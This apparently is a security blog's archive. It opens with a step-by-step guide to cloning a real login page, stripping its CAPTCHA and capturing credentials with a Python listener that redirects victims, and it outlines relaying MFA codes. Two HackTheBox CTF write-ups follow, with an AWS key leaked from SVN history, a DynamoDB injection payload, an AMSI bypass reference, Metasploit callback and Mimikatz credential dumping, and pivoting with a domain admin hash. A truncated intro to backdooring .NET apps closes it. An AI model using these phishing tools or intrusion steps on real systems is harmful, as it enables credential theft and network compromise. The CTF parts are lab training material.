Creating a credential harvesting (phishing) page

I’ve been meaning to write up my method of creating a credential harvesting page and it’s been a while since I’ve posted anything, so here we go.

This method is probably considered pretty basic by some, because it’s literally just copying a site’s HTML and editing it a little to point somewhere else, but I try to follow the KISS principle when possible and it’s a good base for building additional complexity onto later.

In this post I’m going to go over the following points and then provide a few ideas on improving the final product if it were intended to be used in an actual engagement.

  • Finding a target/login page
  • Cloning the target site
  • Modifying the site to point to the attacker’s server

The overall goal of this is to have a site that looks identical to the target’s legitimate login page, will store/send any credentials submitted to it to the attacker’s server, and then redirect back to the legitimate page. The steps I’m going to show are by no means the best/most efficient/most effective way of creating a credential harvester, but I still think it’s useful to see one way it can be done to understand how an attacker may approach the subject.

Finding a target

The first thing we need before we can begin creating our phishing page is a target site, ideally one with a login page users of the site will recognize. An obvious candidate would be a Microsoft login like the one seen below, but I’m going to avoid that for this example because the user submits their username and password across multiple steps/pages, which requires extra logic/code to implement. It’s completely doable, but I want to start with a simpler example.

For this example, I’m going to use the login page for TryHackMe as seen below. It’s a standard login with a CAPTCHA, logos, and other assets that are loaded, along with the form for both username and password.

Cloning the target site

As modern websites rely heavily on JavaScript to render sites once you visit them, my personal preference is to simply “View Source” for the target page and copy/paste all of the content into a new file we’re creating to mimic it. This will generally give us a large HTML file with a lot of individual JavaScript and CSS files being loaded from either the same site or from related CDNs. Once this is done and without changing any of the source code for now, we get the page below when opening it in our browser. For reference, the original site is on the left, with the copied version on the right.

This actually looks much closer to the original than many sites would without any modifications, but there are still some things that are noticeably off in the cloned version. First, the Google CAPTCHA window is displaying an error because it expects to be loaded on a specific domain, which we won’t be matching. Second, the Google logo on the “Sign in with Google” button is not displaying properly, causing the name of the file to be displayed instead. We’ll fix the CAPTCHA eventually, but the first and easier step is to address the assets not loading correctly. In the image below, we can see some of the assets are being loaded using the full absolute URL of wherever the file is stored, whereas others are using a URL relative to what the current site would be (in this case, tryhackme.com).

The fix for this is to simply replace any relative URLs with their absolute versions. This means changing something like “/assets/pace/pace.js” to “https://tryhackme.com/assets/pace/pace.js”. Doing this for the rest of the relative URLs in the source, saving, and reloading gives us the page seen below where the Google image is now rendering correctly, though we still have an issue with the CAPTCHA box. You can save some time changing these URLs using regex patterns in your text editor of choice, but I’ll leave that to the reader for now.
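If you’d rather script the rewrite than do it by hand, the regex approach can be sketched in a few lines of Python. This is a minimal sketch that assumes all relative URLs in the clone are root-relative (start with a single slash) and appear in src/href attributes:

```python
import re

def absolutize(html: str, base: str = "https://tryhackme.com") -> str:
    """Rewrite root-relative src/href URLs to absolute ones.

    Leaves absolute URLs (https://...) and protocol-relative
    URLs (//cdn...) untouched.
    """
    return re.sub(r'((?:src|href)=")(/(?!/))', r'\1' + base + r'\2', html)

if __name__ == "__main__":
    snippet = '<script src="/assets/pace/pace.js"></script>'
    print(absolutize(snippet))
    # <script src="https://tryhackme.com/assets/pace/pace.js"></script>
```

The same pattern works as a find-and-replace in most editors that support regex search.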

Now that we have all visible assets displaying correctly, we can address the CAPTCHA error that will undoubtedly draw a user’s attention. For simplicity’s sake in this post, we’re just going to remove it as most users will likely not even notice if it’s gone or just assume they’re not required to do it again because of a saved session. This can be done by either removing the div seen below referencing the Google CAPTCHA or by erasing the data-sitekey parameter. Both actions will serve the same purpose of removing the CAPTCHA from the rendered page, as seen in the next screenshot.
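The data-sitekey approach can also be scripted rather than edited by hand. A sketch (the exact attribute formatting on the real page may differ from this hypothetical example):

```python
import re

def strip_sitekey(html: str) -> str:
    """Remove any data-sitekey="..." attribute so the reCAPTCHA
    widget never initializes on the cloned page."""
    return re.sub(r'\s*data-sitekey="[^"]*"', '', html)

if __name__ == "__main__":
    div = '<div class="g-recaptcha" data-sitekey="6LcEXAMPLE"></div>'
    print(strip_sitekey(div))
    # <div class="g-recaptcha"></div>
```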

Modifying the site to point to the attacker’s server

Great, now we have a clone that is more or less identical to the original, but if a user logs into the site nothing will happen because the form is still set to send a POST request to /login on the original site. This is seen below, where the form is defined with the “action” parameter set to the endpoint the form’s data is supposed to be sent to.

What would happen if we changed this parameter to point to a server we control with a listener running on port 80 to catch any HTTP requests? As seen below, when the action parameter has been changed and a user tries to log in, the form data is sent to our server with both the username and password visible.
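The listener on the attacker’s side can be as simple as netcat, but a small Python server makes the captured fields easier to log. A minimal sketch using only the standard library (the field names username/password are assumptions; use whatever names the cloned form actually submits, and note that binding to port 80 typically requires root):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

def extract_creds(body: str) -> dict:
    """Parse a URL-encoded form body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body).items()}

class CaptureHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode()
        print("[+] Captured:", extract_creds(body))
        self.send_response(200)
        self.end_headers()

# To run the listener (blocks until killed):
#   HTTPServer(("0.0.0.0", 80), CaptureHandler).serve_forever()
```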

While this is working correctly, there are still a few issues that might deter a user from actually submitting their credentials to the site. As seen below, the form now displays a message that the connection is not secure because our action parameter points to a URL using HTTP instead of HTTPS. In a real-world scenario many users may not even notice or care about this warning, but it’s a good idea to make the clone as realistic as possible.

This could be easily solved by obtaining a valid SSL certificate from a CA like Let’s Encrypt for whatever domain name you end up using to host the site. I’m not going to demo that in this post, but the only changes to the source code would be switching the action to HTTPS, along with configuring your web server of choice to use the new certificate. The process is relatively straightforward and there are many guides, like this one from DigitalOcean, that can be used as a reference.

Potential Improvements

At this point, our clone looks basically identical to the original and is successfully submitting data to our server where it can be logged for future use. However, this is a very basic credential harvesting page that savvy users may recognize as not behaving as expected. To that point, there are a number of things we could add to improve the chances of success, apart from simply adding SSL as described above.

  • At the moment, a login attempt will eventually time out and display an error that the page it was submitting data to didn’t respond as expected or doesn’t exist at all. There are two ways to address this, though I usually prefer the latter. First, we could create another page on our server that sends a response to the login attempt and does something afterward (e.g., display an error, load a different page, etc.). Alternatively, Apache (or another web server) could return a Location header that points the user’s browser back to the legitimate login page on any login attempt. I generally prefer the second option: the longer a user looks at a phishing page, the more likely they are to notice differences or that the URL isn’t quite right, and the redirect ensures they’re back where they expected to be, even if their supposed login attempt didn’t work the first try.
  • Many modern applications implement some form of MFA, and a set of valid credentials alone is no longer enough to gain access to the target service. There are existing open-source tools that help with this, like evilginx2, but it’s also possible to get around MFA on your own with a few additions to the source code and a short Python script run from your server whenever a user tries to log in. The idea is that a user submits their username and password, the attacker’s server extracts the credentials and submits them in the background to the legitimate service/application, and the server then loads a second page that mimics what the site looks like when it expects an MFA code or response. If the user then submits the code to the cloned site, the script on the attacker’s server retrieves it and submits it to the legitimate site as well. This is a good bit more complicated, but if all information is submitted successfully, a login to the real target can be automated and a cookie retrieved that grants access to the site without the need for credentials or MFA codes.
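The redirect idea from the first bullet is a one-header change on the server side. In Apache it would be a Redirect directive; as a sketch in the same Python listener style (the TryHackMe URL is just the example target from this post, and binding to port 80 typically requires root):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

LEGIT_LOGIN = "https://tryhackme.com/login"

class RedirectHandler(BaseHTTPRequestHandler):
    """Log the POSTed form body, then bounce the browser back to
    the legitimate login page, so the user just sees what looks
    like a failed first login attempt."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        print("[+] Captured:", self.rfile.read(length).decode())
        self.send_response(302)
        self.send_header("Location", LEGIT_LOGIN)
        self.end_headers()

# To run the listener (blocks until killed):
#   HTTPServer(("0.0.0.0", 80), RedirectHandler).serve_forever()
```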

That’s all for now, but I hope this was educational or useful in some way. I plan to come back to this in the future and show what some of these improvements would look like when implemented, so hopefully I get around to that sooner rather than later.

HTB Business CTF 2022 – Trade (Cloud)

Overview

The Trade machine was another challenge included in the HackTheBox Business CTF 2022 and was rated as an easy Cloud challenge. The only information provided was the IP of the initial machine and the description below.

With increasing breaches there has been equal increased demand for exploits and compromised hosts. Dark APT group has released an online store to sell such digital equipment. Being part of defense operations can you help disrupting their service ?

Initial Nmap

The initial nmap scan shows 3 ports open from the top 1000: SSH, HTTP, and Subversion.

Nmap scan report for 10.129.186.201
Host is up (0.089s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp   open  http     Apache httpd 2.4.41
|_http-title: Monkey Backdoorz
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/2.1.2 Python/3.8.10
3690/tcp open  svnserve Subversion
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

When visiting the IP in the browser, we’re presented with a login page for “Monkey Backdoorz”. We don’t have credentials at the moment, and common defaults like admin:admin do not seem to work. I began a directory brute-force with gobuster and moved on to investigating the Subversion service identified by nmap.

Subversion

Apache Subversion (SVN) is open-source version control software, similar to Git. According to Google, the biggest difference is that Git’s version control is distributed, while SVN’s is centralized.

For reference, most of the commands I’m using can be found here as a general methodology of investigating Subversion.

We can begin investigating the SVN instance by using a few commands to get an idea of what is stored there. First, we can list the repositories available, which shows only one named store. We can then checkout the store repository and automatically sync any files kept there to our local machine. In this case, this downloads a README and two Python scripts.

$ svn ls svn://10.129.186.194                                                                                                                                                                                             
store/


$ svn checkout svn://10.129.186.194                                                                                                                                                                                             
A    store
A    store/README.md
A    store/dynamo.py
A    store/sns.py
Checked out revision 5.

Sns.py appears to be a script used to interact with instances of an AWS S3 bucket and SNS (Simple Notification Service) located at http://cloud.htb. However, the script seems to have had the AWS secrets removed.

Dynamo.py is another script interacting with an AWS service, this time to create/update a DynamoDB instance. The credentials below for the user ‘marcus’ were found hard-coded in the script.

client.put_item(TableName='users',
    Item={
        'username': {
            'S': 'marcus'
        },
        'password': {
            'S': 'REDACTED'
        },
    }
)

Going back to the web page found earlier, these credentials allow us to log in successfully, but we’re then moved to an OTP prompt. We don’t know how the OTP is generated yet, so I went back to investigating SVN further.

As Subversion works like Git, we can view the log of commits to this particular repository and potentially check out older versions. As seen below, there are 5 revisions available for this repository, with r5 being the latest and the one we downloaded.

$ svn log svn://10.129.186.194                                                                                                                                                                                              
------------------------------------------------------------------------
r5 | root | 2022-06-14 02:59:42 -0700 (Tue, 14 Jun 2022) | 1 line

Adding database
------------------------------------------------------------------------
r4 | root | 2022-06-14 02:59:23 -0700 (Tue, 14 Jun 2022) | 1 line

Updating Notifications
------------------------------------------------------------------------
r3 | root | 2022-06-14 02:59:12 -0700 (Tue, 14 Jun 2022) | 1 line

Updating Notifications
------------------------------------------------------------------------
r2 | root | 2022-06-14 02:58:26 -0700 (Tue, 14 Jun 2022) | 1 line

Adding Notifications
------------------------------------------------------------------------
r1 | root | 2022-06-14 02:49:17 -0700 (Tue, 14 Jun 2022) | 1 line

Initializing repo
------------------------------------------------------------------------

Changing to a previous revision (revision 2) shows an older version of sns.py with the AWS secrets still included.

$ svn checkout svn://10.129.186.201 -r 2                                                                                                                                                                                    

   C store
   A store/README.md
   A store/sns.py
Checked out revision 2.

Old revision of sns.py

region = 'us-east-2'
max_threads = os.environ['THREADS']
log_time = os.environ['LOG_TIME']
access_key = 'AKIA5M34BDN8GCJGRFFB'
secret_access_key_id = 'cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn'

These can be setup in the AWS CLI by running aws configure and entering the appropriate values when prompted (access key, secret access key, region, etc.).

# Install awscli packages
$ sudo apt-get install awscli

# Configure awscli to use the identified secrets
$ aws configure

AWS CLI

With the AWS CLI setup with the appropriate secrets, we need to investigate the services being used by the application: S3 and SNS. Unfortunately, our secrets don’t appear to have permission to enumerate S3 buckets, so I moved on to SNS.

After some trial and error, the command below enumerates the available topics in SNS (Simple Notification Service). --endpoint-url needs to specify the HTB host, as it is running a local instance of the AWS services. I added an entry to my /etc/hosts file pointing cloud.htb to the device’s IP to match the endpoint seen in the Python scripts.

$ aws --endpoint-url=http://cloud.htb sns list-topics                                                                                                                                                                       
{
    "Topics": [
        {
            "TopicArn": "arn:aws:sns:us-east-2:000000000000:otp"
        }
    ]
}

Reading through the documentation, we can subscribe to the topic using the command below and specifying the HTTP protocol along with our attacking IP. This way, whenever a notification is sent it will come over port 80 to our machine. We can monitor for this connection with netcat on port 80 and see any requests that come in.

$ aws --endpoint-url=http://cloud.htb sns subscribe --topic-arn "arn:aws:sns:us-east-2:000000000000:otp" --protocol http --notification-endpoint http://10.10.14.2
{
    "SubscriptionArn": "arn:aws:sns:us-east-2:000000000000:otp:47ceda90-0699-4142-90b7-acad806a5db6"
}

If we have netcat listening when this subscription is submitted, we get a confirmation message from the server for the new subscription.

$ nc -lvnp 80                                                                                                                                                                                                                 

listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.186.201] 38974
POST / HTTP/1.1
Host: 10.10.14.2
User-Agent: Amazon Simple Notification Service Agent
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: text/plain
x-amz-sns-message-type: SubscriptionConfirmation
x-amz-sns-topic-arn: arn:aws:sns:us-east-2:000000000000:otp
x-amz-sns-subscription-arn: arn:aws:sns:us-east-2:000000000000:otp:9a21091c-7dcc-4349-9146-609d063997ee
Content-Length: 831

{"Type": "SubscriptionConfirmation", "MessageId": "cbda25dd-1fcf-4c08-8b0a-555d6ecc4d3f", "TopicArn": "arn:aws:sns:us-east-2:000000000000:otp", "Message": "You have chosen to subscribe to the topic arn:aws:sns:us-east-2:000000000000:otp.\nTo confirm the subscription, visit the SubscribeURL included in this message.", "Timestamp": "2022-07-18T18:35:11.625Z", "SignatureVersion": "1", "Signature": "EXAMPLEpH+..", "SigningCertURL": "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-0000000000000000000000.pem", "SubscribeURL": "http://localhost:4566/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-2:000000000000:otp&Token=c348e025", "Token": "c348e025", "UnsubscribeURL": "http://localhost:4566/?Action=Unsubscribe&SubscriptionArn=arn:aws:sns:us-east-2:000000000000:otp:9a21091c-7dcc-4349-9146-609d063997ee"}
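Confirming the subscription is just a GET to the SubscribeURL included in that message (in this local setup it may not even be required, and the URL points at localhost:4566, so it might need rewriting to cloud.htb before visiting). A sketch of pulling the URL out of the POST body, based on the message format above:

```python
import json

def get_subscribe_url(body):
    """Return the SubscribeURL from an SNS SubscriptionConfirmation
    message body, or None if this isn't a confirmation message."""
    msg = json.loads(body)
    if msg.get("Type") == "SubscriptionConfirmation":
        return msg.get("SubscribeURL")
    return None

# Visiting the returned URL (e.g. with curl or urllib.request)
# confirms the subscription.
```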

Now, with netcat listening on port 80, logging into the web app with marcus’ credentials sends the notification below, which includes an OTP in the section I have isolated.

$ nc -lvnp 80                                                                                                                                                                                                                   
listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.186.194] 47912
POST / HTTP/1.1
Host: 10.10.14.2
User-Agent: Amazon Simple Notification Service Agent
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: text/plain
x-amz-sns-message-type: Notification
x-amz-sns-topic-arn: arn:aws:sns:us-east-2:000000000000:otp
x-amz-sns-subscription-arn: arn:aws:sns:us-east-2:000000000000:otp:47ceda90-0699-4142-90b7-acad806a5db6
Content-Length: 529

{"Type": "Notification", "MessageId": "d361f33c-6566-458f-862e-a137e24f4657", "TopicArn": "arn:aws:sns:us-east-2:000000000000:otp", "Message": "

{\"otp\": \"74918031\"}", <----- OTP Number

"Timestamp": "2022-07-17T23:38:26.886Z", "SignatureVersion": "1", "Signature": "EXAMPLEpH+..", "SigningCertURL": "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-0000000000000000000000.pem", "UnsubscribeURL": "http://localhost:4566/?Action=Unsubscribe&SubscriptionArn=arn:aws:sns:us-east-2:000000000000:otp:47ceda90-0699-4142-90b7-acad806a5db6"}
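Rather than eyeballing the raw POST, the OTP can be parsed out programmatically. The Message field is itself a JSON string, so it takes two decodes; a sketch based on the notification format above:

```python
import json

def extract_otp(body):
    """Pull the OTP out of an SNS Notification whose Message field
    is a nested JSON document like {"otp": "74918031"}."""
    outer = json.loads(body)
    inner = json.loads(outer["Message"])
    return inner["otp"]

sample = '{"Type": "Notification", "Message": "{\\"otp\\": \\"74918031\\"}"}'
print(extract_otp(sample))  # 74918031
```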

Using this number at the OTP prompt allows us to successfully log in to the website.

The website itself appears to be a marketplace for access to various companies, but the cart functionality doesn’t seem to be fully functional.

DynamoDB Injection

At the bottom of the page is a link to a search page for more exploits.

Visiting this page gives a pretty generic search box and results message when entering regular text.

However, based on the script found earlier in SVN, it appears the website is using a DynamoDB database, which is a proprietary NoSQL database service used by Amazon.

After some fuzzing on the search parameter, a few characters cause a different result to be displayed. The screenshot below shows the result when the string zzzzz” is entered, displaying a JSONDecodeError and the query being sent to the database. A few Google searches on this error and the variables used in the query confirm the search is most likely backed by a DynamoDB instance to which our input is passed directly.

After some research on DynamoDB injections, I found this article discussing ways to exploit them and how they work. The important part is quoted below:

With String attributes, comparison gets tricky, as comparison depends on the ASCII lexical ordering of strings, therefore, if you compare string values against another string with lower lexical ordering like * or a string with whitespace its likely to be always greater than or less than the queried string.

I also found this useful website showing the ASCII sort order, with the first character being a space.

This effectively means that if we can inject a string comparison against something like a whitespace character, it will function the same as the usual “OR 1=1” used in other common SQL injections and return every item from the database. With some trial and error, our full query eventually ends up looking like the JSON data below when expanded. This takes the original query seen in the error message and adds a second comparison using greater than (GT) against the space character, which evaluates true for every other ASCII character, essentially returning everything.

{
    "servername": 
    {
        "ComparisonOperator": "EQ","AttributeValueList": [
                {
                    "S": "START_OF_PAYLOAD"
                }
            ]
    },
    "servername": 
    {
        "ComparisonOperator": "GT","AttributeValueList": [
                {
                    "S": " "
                }
            ]
    }
}

When compressed to one line and the rest of the query removed (including the final "}]}} added by the server), we get the payload below (there is a space at the end, though it’s not easy to see).

START_OF_PAYLOAD"}]},"servername":{"ComparisonOperator": "GT","AttributeValueList": [{"S": " 

When this payload is submitted, the injection appears to be successful as the results include everything in the database. In this case, this is a list of servers, usernames, passwords, and shell locations.
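Part of why the duplicated servername key works is that many JSON parsers keep the last occurrence of a duplicate key, so the injected GT-against-space condition silently replaces the server’s original EQ condition. A quick sketch of both behaviors (Python’s json module mirrors what many backends do here, though this is an assumption about the specific parser on the target):

```python
import json

# ASCII ordering: a space sorts below every printable character,
# so a GT " " comparison matches effectively every string value.
assert " " < "0" < "A" < "a"

# Duplicate keys: the last occurrence wins when parsed.
injected = '''{
    "servername": {"ComparisonOperator": "EQ",
                   "AttributeValueList": [{"S": "START_OF_PAYLOAD"}]},
    "servername": {"ComparisonOperator": "GT",
                   "AttributeValueList": [{"S": " "}]}
}'''
query = json.loads(injected)
print(query["servername"]["ComparisonOperator"])  # GT
```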

The list of usernames/passwords can be taken and tried against the SSH service that was seen listening on the server initially. Eventually, we discover the credentials for mario are valid and allow us to log in.

The flag.txt can be found in mario’s home directory.

HTB Business CTF 2022 – Commercial (FullPwn)

Overview

The Commercial machine was a challenge included in the HackTheBox Business CTF 2022 over the weekend and was rated as hard difficulty. The only information provided was the IP of the initial machine and the description below.

We have identified a dark net market by indexing the web and searching for favicons that belong to similar marketplaces. You are tasked with breaking into this marketplace and taking it down.

Initial Nmap Scan

The initial nmap scan below shows 4 ports open out of the top 1000 automatically scanned. The banners tell us it is a Windows machine (though with OpenSSH running), but the services available are an odd combination either way. The SSL certificate identified for the HTTPS service leaks the hostname of the box as commercial.htb.

$ sudo nmap -sC -sV 10.129.227.235 -v

Nmap scan report for commercial.htb (10.129.227.235)                                                                                                                                                                          [6/1341]
Host is up (0.084s latency).                                                                                       
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION                      
22/tcp  open  ssh        OpenSSH for_Windows_8.1 (protocol 2.0)                                                                                                                                                                       
| ssh-hostkey: 
|   3072 ee:69:a0:e8:d7:43:6a:40:99:c6:16:0c:43:d3:d0:df (RSA)
|   256 73:95:19:f7:ac:36:3c:f9:78:6b:27:c6:b9:cb:c2:83 (ECDSA)                                                                                                                                                                       
|_  256 ec:2c:11:ab:ba:5e:30:4e:6d:b9:65:6b:ad:6d:39:e4 (ED25519)
135/tcp open  msrpc      Microsoft Windows RPC
443/tcp open  ssl/http   Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-server-header: 
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2022-07-18T19:02:38+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=commercial.htb
| Subject Alternative Name: DNS:commercial.htb
| Issuer: commonName=commercial.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-10T21:15:25
| Not valid after:  2023-07-10T21:35:25
| MD5:   6aac 8f67 aa3e b943 6e94 987b ee75 ff91
|_SHA-1: c6fc 3014 4e1d d2d4 78c8 09e3 2c94 96b4 80c2 e2dd
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Monkey Store
|_http-favicon: Unknown favicon MD5: 0715D95B164104D2406FE35DC990AFDA
593/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

User Flag

HTTPS

Visiting the IP in the browser returns an SSL error as the certificate appears to be for commercial.htb instead of the specific IP.

However, when accepting the risk and continuing we’re presented with a 404 error that the page cannot be found. This appears to be due to the server expecting the name commercial.htb specifically rather than the IP address. After updating my /etc/hosts file to point the IP to commercial.htb and reloading the page, it loads successfully and we’re given the home page for “Monkey Store”.

The message below is included on the page, mentioning that all links were taken down previously and some functionality is still down. This is confirmed when clicking around the home/market pages, where nothing seems to be interactive and there is no way to add items to a cart or log in (though I haven’t brute-forced directories/pages at this point).

Update 15-07-2022:

We are back up and running. The old link was unfortunately
seized and taken down by ??????. Parts of this website are
still under development. Registrations are currently down.
Only our most trusted vendors and customers can access the
store. The issue will be resolved very soon. A lot of exit
nodes are being taken down by ??????. Be vigilant.
~ MB

Update 16-03-2020:

Error........We are deleting all of the available listings.
Not for ever.  Until it is safe for our vendors and buyers.
It is very vital that you stay away from this market place.
Going away for some time. They are close. Hide your tracks.
Most of our servers have been taken down. This is the last.
Above all do not access the City Market. It is compromised.
~ MB

Normally, I would move on to attempting to brute force directories with gobuster or investigating the web app further, but in this case I noticed a considerable number of files being loaded in the Firefox DevTools whenever a page was requested. The vast majority appear to be initiated by the file blazor.webassembly.js. Blazor is a C# framework used to build interactive web apps with .NET.

In my research, I found the video below, which discusses how Blazor WebAssembly applications can be exploited if the project’s DLLs are visible when the application loads (as seen above). Since we can see the list of DLLs loaded by the app, we can download any of them individually and inspect them with an application like dnSpy or ILSpy, which can decompile the .NET code. Many of the DLLs appear to be related to Microsoft packages, but “Commercial.Client.dll” and “Commercial.Shared.dll” appear to be associated with this specific project, so those are our first targets.

Decompiling Blazor DLLs

I downloaded both files mentioned above and opened them in dnSpy which, as seen below, was able to load them successfully. I began with “Commercial.Shared.dll” for no particular reason, but it ended up being the more interesting file either way.

Drilling down into the namespaces and functions of the application reveals hardcoded credentials for the user Timothy.Price that appear to be used in a SQL connection string required for the application to function.

Using these credentials against the SSH service that was identified in the initial scan successfully logs us in as timothy.price and shows us the hostname of this machine is CMF-WKS001.

The user.txt flag can then be found on this user’s desktop.

Privilege Escalation to Richard.Cartwright

Before moving any further, I ran ipconfig to get an idea of our network interfaces. The only active one is for the IP 172.16.22.2, which means there is NAT involved somewhere that routes the 10.x.x.x address we originally used to this host.

Event Log Reader Group

Checking the user’s permissions shows he is a member of the “Event Log Readers” group, a non-standard membership that gives its members read access to any event log.

Initial checks using PowerShell show there are 7 different logs we can read, though only 3 appear to have data available. Windows PowerShell specifically sounds interesting as a first place to check.

From here, I used the command below to enumerate the PowerShell logs. This was a little tedious, as it retrieves every log in the category, but while scrolling through, one eventually stood out as containing a base64-encoded command.

Get-EventLog -LogName "Windows PowerShell"

This encoded PowerShell command decodes into the command below, which includes credentials for the user richard.cartwright.

$passwd = ConvertTo-SecureString "REDACTED" -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential ("commercial\richard.cartwright", $passwd)
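PowerShell’s -EncodedCommand values are base64 over UTF-16LE text, so decoding one pulled from the event log is a two-step process. A sketch (the sample string here is generated on the spot, not the one from the box):

```python
import base64

def decode_ps_command(b64):
    """Decode a PowerShell -EncodedCommand value: base64 of UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")

def encode_ps_command(cmd):
    """Encode a command the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()

sample = encode_ps_command('Write-Host "hello"')
print(decode_ps_command(sample))  # Write-Host "hello"
```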

Moving back to SSH again, we’re able to successfully log in as richard.cartwright with these new credentials.

2nd Privilege Escalation to Local Admin

Unfortunately, Richard doesn’t seem to have anything very interesting in his home directory. Checking this user’s permissions, we can see he is a member of a custom domain group named “IT_Staff”.

At this point, Bloodhound could be run to gather domain information and plot out the same attack path I’m going to use, but I had some trouble with my SSH session not running Bloodhound correctly in PowerShell and the executable being detected by Windows Defender. I didn’t feel like putting a lot of effort into obfuscating the script past changing function names, so I moved on to using PowerView instead for domain recon. Below I’m retrieving the script from my machine and running the Get-Domain command to confirm the script was loaded correctly.

NOTE: Before I load any script into a PowerShell session, I run an AMSI bypass to ensure the scripts function correctly without Defender/AMSI stopping them. There are various bypasses around the internet, with a good collection at https://amsi.fail/, though several from that site are detected as malicious nowadays if used as-is.

Using PowerView to investigate the “IT_Staff” group, we can see Richard is the only member.

Get-DomainGroupMember -Identity "IT_Staff" -Domain commercial.htb

This doesn’t tell us much more about what the group can do, so I ran the script PrivescCheck.ps1 to perform a variety of checks for local misconfigurations that would allow us to elevate privileges locally, if not in the domain. This script performs many of the same checks as tools like Seatbelt and PowerUp.

Invoke-PrivescCheck -Extended -Report check -Format HTML

The command above outputs the results to an HTML file that can be downloaded from the machine for easier reference, but I noticed during the execution that one check showed LAPS (Local Administrator Password Solution) was enabled on this machine.

With LAPS enabled, we can use the LAPSToolkit to help identify which groups/users potentially have access to read the LAPS password.

As seen in the image above, the IT_Staff group we are a member of happens to have permission to read the LAPS passwords. The same LAPSToolkit script can then be used to retrieve any LAPS passwords set for machines in the domain. This gives us the administrator password for the CMF-WKS001 machine, which is what we’re currently working on. This also shows us there are two other computers in the commercial.htb domain, one of which appears to be the domain controller.

Taking this password and going back to SSH one more time shows the credentials are valid and allow us to log in as the local administrator of the machine.

Accessing the Domain Controller

Though there are multiple users and home directories on the machine, there is no root flag to be found. In this case, given there are multiple machines in the domain, the root flag is likely on the domain controller seen earlier in our enumeration. I used Metasploit to help make post-exploitation easier and opted for the multi/script/web_delivery module to deliver the initial payload through a PowerShell command using the configuration below.

After it is run, this module starts a web server and produces a PowerShell command to be run on the target that will call back and retrieve the stager for the meterpreter payload. Running this command in our SSH session as the local administrator successfully gives us a new session in Metasploit.

As we’re the local administrator, we should have the appropriate access to dump credentials from the device. hashdump can be used to dump the local SAM database, but we want to gather domain credentials as well so I chose the kiwi module which includes functionality from Mimikatz. The commands below will elevate our session from administrator to SYSTEM and then load the kiwi module.

# Elevate admin session to NT Authority\SYSTEM.  This may fail due to AV detection
meterpreter > getsystem
# Load the kiwi module for dumping credentials
meterpreter > load kiwi

Finally, the creds_all command can be used to dump all available credentials from the device, domain and otherwise. As seen below, this includes the hash for the Administrator account for the commercial.htb domain, which is by default a domain admin.

Now that we have a domain admin’s NTLM hash, we could potentially use it to access the domain controller identified earlier. The problem is the DC is not reachable from our “public” IP, only from the internal subnet the workstation is on. There are several ways to solve this, but I chose to continue with Metasploit and use its routing/proxy functionality to tunnel traffic from my system through the active meterpreter session.

# Add a route in metasploit to direct any traffic to the 172.16.22.0/24 subnet through the active session
route add 172.16.22.0/24 <session ID>

# Start the socks_proxy module to allow proxychains to redirect traffic to the session
use auxiliary/server/socks_proxy
run -j

With the route and proxy running in Metasploit, proxychains can be used to route the traffic of normal Linux tools through the current meterpreter session. The configuration file at /etc/proxychains.conf (or /etc/proxychains4.conf) may need to be modified to match the port used in the socks_proxy module, but mine are both currently using port 1080.
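For reference, the relevant section of my proxychains config, assuming the socks_proxy module's defaults (SOCKS version 5, port 1080):

```shell
# /etc/proxychains4.conf (tail of the file)
# This entry must match the VERSION/SRVPORT of auxiliary/server/socks_proxy
[ProxyList]
socks5  127.0.0.1 1080
```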

By prepending proxychains to the impacket-wmiexec command below, the traffic will be sent through the metasploit session and to the domain controller successfully. As we are able to reach the domain controller and have valid credentials for the domain administrator account, this provides us with a semi-interactive shell on CMD-SRVDC01.

NOTE: Other impacket tools like psexec or smbexec could also be used for this step, but I’ve found them more likely to be detected and stopped by AV.

Using this shell to navigate to the administrator’s desktop finds the root.txt file and the 2nd flag.

Backdooring a .NET application with dnSpy

Intro

I haven’t written anything in a while because I’ve been going through various training courses, but I want to start getting back into the habit of it, so today I’m going to talk about the process of adding a backdoor to a .NET application. Given how popular C#/.NET is today, this seems like a good topic.

